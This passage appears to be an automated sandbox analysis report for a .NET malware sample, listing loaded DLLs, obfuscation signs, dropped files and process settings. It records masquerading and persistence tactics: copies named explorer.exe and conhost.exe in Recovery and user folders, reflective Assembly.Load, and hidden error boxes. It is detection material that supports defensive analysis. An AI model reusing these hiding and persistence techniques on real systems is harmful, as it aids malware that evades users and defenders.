                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: mscoree.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: apphelp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: version.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: windows.storage.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: wldp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: profapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: cryptsp.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: rsaenh.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: cryptbase.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: sspicli.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: ktmw32.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: amsi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: userenv.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dnsapi.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: CPNSQusnwC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: CPNSQusnwC.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: CPNSQusnwC.exeStatic file information: File size 2670080 > 1048576
                    Source: CPNSQusnwC.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x28b600
                    Source: CPNSQusnwC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: CPNSQusnwC.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                    Source: CPNSQusnwC.exe, 857.cs.Net Code: _736
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343D3CB9 push ebx; retf 0_2_00007FFD343D3CBA
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD343D00BD pushad ; iretd 0_2_00007FFD343D00C1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A8167 push ebx; ret 0_2_00007FFD345A816A
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeCode function: 0_2_00007FFD345A9E10 pushad ; ret 0_2_00007FFD345A9E11

                    Persistence and Installation Behavior

                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\conhost.exe
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\UJAAAsrr.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\AxLDtRxd.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DrOTkRbS.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\qVqwKxgw.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\DiqTAfIW.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\pxxplmMK.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\GWITZydS.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TmvagkQx.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nTDOpObA.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\SVwsOfwt.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\CxYvgXXc.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\ufMwPuFo.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\hovXJzGK.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FnPmnTXV.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\wdeWzfMx.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\uNFeAYLl.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UPlQSaAj.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\FZhLDyOY.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\bvfQbQIf.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\HzZUtpuN.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\QwEjYoPD.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\aIOpvFFY.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ELylTcFa.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ySVMqwBm.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\liYyiBRH.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\bqhiOmsd.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\xQsMWHQg.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\fJbhCUkS.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\zJHvHEBf.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\gljzVSiX.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\eJSyBaRc.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\jWOPcftP.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\cSkqvYkZ.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\vEieQmso.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Recovery\conhost.exe
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\UOyjNWIs.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TvSaQXjt.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\scaNtKAs.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\sUqvPban.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\dGozhlgX.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\SSKIxalp.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\uaPNCQpm.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\WJAzEWli.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\tQeVfYwq.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\GzLcGkVO.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\LmdbigkC.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\ejwQzjeb.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\QhesqMaw.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\nDhGzpaM.log
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeFile created: C:\Users\user\Desktop\TkfSyAEq.log
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeFile created: C:\Users\user\Desktop\FBkUkkGT.log

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
